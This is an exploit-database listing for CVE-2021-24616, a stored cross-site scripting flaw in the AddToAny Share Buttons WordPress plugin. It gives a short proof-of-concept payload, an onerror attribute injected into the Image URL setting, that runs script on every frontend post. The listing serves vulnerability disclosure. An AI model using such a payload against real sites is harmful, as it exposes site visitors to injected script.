Exploit for AddToAny Share Buttons < 1.7.48 - Admin+ Stored Cross-Site Scripting CVE-2021-24616

Name: Exploit for AddToAny Share Buttons < 1.7.48 - Admin+ Stored Cross-Site Scripting CVE-2021-24616
Rating: 5 (299 reviews)

2021-08-10 | CVSS 3.5

## https://sploitus.com/exploit?id=WPEX-ID:04EAF380-C345-425F-8800-142E3F4745A9
Add the following payload in the Universal Button > Image URL settings: " onerror=alert(/XSS/) "

The XSS will be triggered in all frontend posts